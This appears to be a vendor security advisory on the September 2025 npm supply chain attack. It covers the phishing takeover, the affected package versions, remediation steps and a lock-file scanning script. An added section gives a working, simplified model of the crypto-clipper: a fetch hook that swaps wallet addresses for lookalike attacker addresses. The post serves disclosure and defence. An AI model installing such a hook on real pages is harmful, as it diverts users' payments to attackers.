
What You Need To Know About the NPM Supply Chain Attack

By Aviram Shmueli

Updated September 9, 2025


On September 8, 2025, a critical supply chain attack on 18 widely used npm packages was disclosed. Together these packages account for roughly 2 billion weekly downloads, and because most of them are low-level utilities (chalk, debug, strip-ansi and their dependencies) they are pulled in transitively by a large share of the JavaScript ecosystem, usually without the consuming project listing them directly.

What happened?

The maintainer’s npm account was taken over through a phishing email that impersonated an npm account-security notice. The phishing page captured both the password and the one-time 2FA code, so TOTP-based two-factor authentication did not stop the takeover; only phishing-resistant factors (WebAuthn/passkeys) or publishing from CI via npm’s trusted publishing would have. On September 8 the attacker used the hijacked account to publish malicious versions of the packages.

What does the attack do?

The malicious payload is a browser-side crypto-clipper. It runs only when the package ends up in a web bundle: it hooks fetch, XMLHttpRequest and wallet provider APIs such as window.ethereum, watches responses and pending transactions for cryptocurrency addresses across several chains, and rewrites the legitimate destination address to an attacker-controlled one chosen to look as similar as possible to the original (the payload picks the closest match by edit distance). Because the swap happens inside the page before the user signs, a wallet prompt that simply displays what the dApp hands it shows the attacker’s address. Server-side Node.js services that installed the bad versions did not execute this code path, but any frontend bundle built while the malicious versions were live must be treated as compromised.
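The following is an added, simplified model of that address-swapping technique, written for this article; it is not the real payload and not code from the affected packages. The attacker addresses, the victim address and the fake backend response are all constructed for the demo, and the hook is installed on a private object rather than on globalThis so the script does not tamper with the process it runs in. It also shows the one cheap defensive check an application can make: capture a reference to fetch before any third-party bundle runs and compare it later.

```javascript
// Constructed illustration of a response-rewriting fetch hook (not the real payload).
// Hypothetical attacker-controlled addresses; these are not real indicators.
const ATTACKER_ADDRESSES = [
  "0x" + "1".repeat(40),
  "0xabcdef0123456789abcdef0123456789abcdef01",
  "0x" + "9".repeat(40),
];

// Constructed victim address: differs from the first attacker address only in
// the last four characters, so a quick visual check will not catch the swap.
const VICTIM_ADDRESS = "0x" + "1".repeat(36) + "2222";

// Standard Levenshtein edit distance. The real payload used it to pick, from
// its own list, the attacker address that looks most like the legitimate one.
function levenshtein(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
    }
  }
  return d[a.length][b.length];
}

function closestLookalike(address) {
  return ATTACKER_ADDRESSES.reduce((best, cand) =>
    levenshtein(cand, address) < levenshtein(best, address) ? cand : best);
}

// EVM-style addresses only; the real payload carried patterns for several chains.
const EVM_ADDRESS = /0x[0-9a-fA-F]{40}/g;

function swapAddresses(text) {
  return text.replace(EVM_ADDRESS, (addr) => closestLookalike(addr));
}

// Wrap an existing fetch so every response body passes through swapAddresses().
// Status and headers are preserved, so the calling code sees nothing unusual.
function installFetchHook(target) {
  const original = target.fetch;
  target.fetch = async function hookedFetch(...args) {
    const res = await original.apply(this, args);
    const body = swapAddresses(await res.text());
    return new Response(body, { status: res.status, headers: res.headers });
  };
  return original;
}

// Defensive counterpart: compare against a reference captured at startup.
// Identity comparison catches a replaced function; it cannot catch a hook
// that was installed before your own code ran.
function fetchWasReplaced(target, trustedFetch) {
  return target.fetch !== trustedFetch;
}

// Constructed stand-in for the dApp backend that returns the real destination.
async function fakeServerFetch() {
  return new Response(JSON.stringify({ to: VICTIM_ADDRESS, amount: "1.5" }), {
    status: 200,
    headers: { "content-type": "application/json" },
  });
}

// End-to-end run against an isolated object instead of globalThis.
async function runDemo() {
  const page = { fetch: fakeServerFetch };
  const trusted = page.fetch;

  const clean = await (await page.fetch("/api/tx")).json();
  installFetchHook(page); // what the malicious bundle does at load time
  const tampered = await (await page.fetch("/api/tx")).json();

  return {
    cleanTo: clean.to,
    tamperedTo: tampered.to,
    hookDetected: fetchWasReplaced(page, trusted),
  };
}

runDemo().then((r) => console.log(r));
```

The practical lesson for wallet users is that the page cannot be trusted to display the destination: confirm the address on a hardware wallet screen or through a channel the page does not control.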

Which packages are affected?

  • ansi-regex@6.2.1
  • ansi-styles@6.2.2
  • backslash@0.2.1
  • chalk-template@1.1.1
  • chalk@5.6.1
  • color-convert@3.1.1
  • color-name@2.0.1
  • color-string@2.1.1
  • color@5.0.1
  • debug@4.4.2
  • has-ansi@6.0.1
  • is-arrayish@0.3.3
  • simple-swizzle@0.2.3
  • slice-ansi@7.1.1
  • strip-ansi@7.1.1
  • supports-color@10.2.1
  • supports-hyperlinks@4.1.1
  • wrap-ansi@9.0.1

Status: All malicious versions have since been removed from npm. Note that the version numbers above are the only malicious ones; earlier releases of these packages are clean, and reinstalling today resolves to clean versions.

What you should do

  • Find your exposure in lock files, not package.json: these packages arrive transitively, so check package-lock.json, yarn.lock or pnpm-lock.yaml (and the lock files cached by CI) for the exact versions listed above. npm ls chalk debug strip-ansi, for example, shows where they sit in the installed tree.
  • Revert to safe versions: Pin the affected packages to versions published before the compromise (or to the clean releases the maintainers have published since). Prefer adding overrides (npm) or resolutions (Yarn) for the affected names and regenerating the lock file over deleting the lock file outright, which also drifts every other dependency; if you do delete and reinstall, diff the new lock file against the old one and confirm none of the versions above reappear.
  • Rebuild tainted artifacts: Any frontend bundle built or deployed while the malicious versions were live (September 8) should be rebuilt from a clean install and redeployed, since the payload runs in the browser, not at install time.
  • Scan your codebase: Run npm audit or an SCA tool to detect the compromised versions in your dependency tree. Advisory-driven tools only flag what has been published as an advisory, so a direct lock-file check against the version list above is the more reliable test for this incident.
  • Check your SBOM report: Use the SBOM to gain full visibility into your dependencies and quickly assess potential exposure. An SBOM generated from the lock file at build time tells you which builds shipped with which versions.
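As an added example for the lock-file check above (not code from the original article or from Jit), here is a stand-alone Node.js script that walks an npm lock file and reports every occurrence of the 18 compromised versions, wherever they sit in the tree. It handles lockfileVersion 1 (nested dependencies) and 2/3 (flat packages map keyed by node_modules path). The two sample lock files embedded in it are constructed for the demo; run it with a path to use your real package-lock.json.

```javascript
// Exact compromised versions from the advisory above; everything else is clean.
const COMPROMISED = {
  "ansi-regex": ["6.2.1"],
  "ansi-styles": ["6.2.2"],
  "backslash": ["0.2.1"],
  "chalk-template": ["1.1.1"],
  "chalk": ["5.6.1"],
  "color-convert": ["3.1.1"],
  "color-name": ["2.0.1"],
  "color-string": ["2.1.1"],
  "color": ["5.0.1"],
  "debug": ["4.4.2"],
  "has-ansi": ["6.0.1"],
  "is-arrayish": ["0.3.3"],
  "simple-swizzle": ["0.2.3"],
  "slice-ansi": ["7.1.1"],
  "strip-ansi": ["7.1.1"],
  "supports-color": ["10.2.1"],
  "supports-hyperlinks": ["4.1.1"],
  "wrap-ansi": ["9.0.1"],
};

function isCompromised(name, version) {
  const bad = COMPROMISED[name];
  return Boolean(bad && bad.includes(version));
}

// lockfileVersion 2/3: keys look like "node_modules/chalk" or
// "node_modules/foo/node_modules/debug". The package name is whatever follows
// the last "node_modules/" (scoped names keep their "@scope/" prefix).
function scanPackagesMap(packages) {
  const hits = [];
  for (const [path, meta] of Object.entries(packages)) {
    const idx = path.lastIndexOf("node_modules/");
    if (idx === -1) continue; // "" is the root project itself
    const name = path.slice(idx + "node_modules/".length);
    if (isCompromised(name, meta.version)) hits.push({ name, version: meta.version, path });
  }
  return hits;
}

// lockfileVersion 1: a tree of { name: { version, dependencies: {...} } }.
function scanDependencyTree(deps, parent = "", hits = []) {
  for (const [name, meta] of Object.entries(deps || {})) {
    const path = parent ? `${parent}/node_modules/${name}` : `node_modules/${name}`;
    if (isCompromised(name, meta.version)) hits.push({ name, version: meta.version, path });
    scanDependencyTree(meta.dependencies, path, hits);
  }
  return hits;
}

function findCompromised(lock) {
  if (lock.packages) return scanPackagesMap(lock.packages);
  return scanDependencyTree(lock.dependencies);
}

// Constructed lockfileVersion 3 sample: one clean entry, one direct hit, one nested hit.
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/chalk": { version: "5.6.0" },
    "node_modules/debug": { version: "4.4.2" },
    "node_modules/some-lib/node_modules/strip-ansi": { version: "7.1.1" },
  },
};

// Constructed lockfileVersion 1 sample with the same nested hit.
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    chalk: { version: "5.6.0" },
    "some-lib": { version: "1.0.0", dependencies: { "strip-ansi": { version: "7.1.1" } } },
  },
};

// Prints one line per hit and returns the hit count (non-zero means exposed).
function report(lock) {
  const hits = findCompromised(lock);
  for (const h of hits) console.log(`COMPROMISED ${h.name}@${h.version} at ${h.path}`);
  if (hits.length === 0) console.log("no compromised versions found");
  return hits.length;
}

// Usage: node scan-lock.js package-lock.json   (exit code 1 if anything is found)
if (process.argv[2]) {
  import("node:fs").then(({ readFileSync }) => {
    const lock = JSON.parse(readFileSync(process.argv[2], "utf8"));
    process.exitCode = report(lock) > 0 ? 1 : 0;
  });
} else {
  report(SAMPLE_LOCK);
}
```

The script does not parse yarn.lock or pnpm-lock.yaml; for those, yarn why <name> and pnpm why <name> answer the same question, and the version list above is what to compare against. Wiring the script into CI as a failing step is a cheap guardrail until your SCA tool carries the advisories.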

How Jit protects you

Jit covers this incident in several ways:

  1. Jit automatically scans your git repositories and detects the compromised package versions in your code base, using our Software Composition Analysis (SCA) tool.

  2. Jit helps you set guardrails for your developers so that those compromised versions cannot be introduced in new code (PR/MR).

  3. Jit provides a Software Bill of Materials (SBOM) report, giving you a full dependency audit across your projects. This ensures you have complete visibility into every component and can quickly assess your exposure in situations like this.

Jit's SCA tool runs daily. To trigger a full code scan immediately, deactivate and then re-activate the SCA tool (Jit-003) in the Jit Max Security Plan.